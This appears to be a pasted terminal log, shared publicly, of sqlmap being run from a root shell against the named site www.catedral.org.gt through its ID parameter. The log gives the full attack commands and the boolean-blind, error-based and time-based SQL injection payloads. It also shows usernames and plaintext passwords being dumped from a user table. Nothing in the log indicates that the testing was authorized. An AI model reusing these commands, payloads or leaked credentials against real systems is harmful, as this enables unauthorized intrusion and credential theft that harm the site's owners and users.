- [01:31:38] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Fedora 15 (Lovelock)
- web application technology: PHP 5.3.6, Apache 2.2.17
- back-end DBMS: MySQL 5.0
- do you want sqlmap to consider provided column(s):
- [1] as LIKE column names (default)
- [2] as exact column names
- > 2
- [01:31:41] [INFO] fetching columns 'strUser' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
- [01:31:42] [INFO] the SQL query used returns 1 entries
- [01:31:43] [INFO] retrieved: strUser
- [01:31:43] [INFO] retrieved: varchar(64)
- [01:31:43] [INFO] fetching entries of column(s) 'strUser' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
- [01:31:43] [INFO] the SQL query used returns 2 entries
- [01:31:44] [INFO] retrieved: anion
- [01:31:44] [INFO] retrieved: ANONYMOUS
- [01:31:44] [INFO] analyzing table dump for possible password hashes
- Database: dbusuarios
- Table: tbl_user_mspasgobgt
- [2 entries]
- +-----------+
- | strUser |
- +-----------+
- | anion |
- | ANONYMOUS |
- +-----------+
- [01:31:45] [INFO] table 'dbusuarios.tbl_user_mspasgobgt' dumped to CSV file '/pentest/database/sqlmap/output/www.catedral.org.gt/dump/dbusuarios/tbl_user_mspasgobgt.csv'
- [01:31:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
- [*] shutting down at 01:31:45
- root@bt:/pentest/database/sqlmap# /sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt -C strPassword --dump
- bash: /sqlmap.py: No such file or directory
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt -C strPassword --dump
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 01:39:07
- [01:39:07] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0
- [00:39:07] [INFO] resuming back-end DBMS 'mysql'
- [00:39:18] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: ID
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: ID=4233 AND 7933=7933
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: ID=4233 AND SLEEP(5)
- ---
- [01:39:19] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Fedora 15 (Lovelock)
- web application technology: PHP 5.3.6, Apache 2.2.17
- back-end DBMS: MySQL 5.0
- do you want sqlmap to consider provided column(s):
- [1] as LIKE column names (default)
- [2] as exact column names
- > 2
- [01:39:23] [INFO] fetching columns 'strPassword' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
- [01:39:23] [INFO] the SQL query used returns 1 entries
- [01:39:26] [INFO] retrieved: strPassword
- [01:39:26] [INFO] retrieved: varchar(32)
- [01:39:26] [INFO] fetching entries of column(s) 'strPassword' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
- [01:39:26] [INFO] the SQL query used returns 2 entries
- [01:39:27] [INFO] retrieved: aniongt
- [01:39:27] [INFO] retrieved: LOLLOL
- [01:39:28] [INFO] analyzing table dump for possible password hashes
- Database: dbusuarios
- Table: tbl_user_mspasgobgt
- [2 entries]
- +-------------+
- | strPassword |
- +-------------+
- | aniongt |
- | LOLLOL |
- +-------------+
- [01:39:28] [INFO] table 'dbusuarios.tbl_user_mspasgobgt' dumped to CSV file '/pentest/database/sqlmap/output/www.catedral.org.gt/dump/dbusuarios/tbl_user_mspasgobgt.csv'
- [01:39:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
- [*] shutting down at 01:39:28
- root@bt:/pentest/database/sqlmap#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement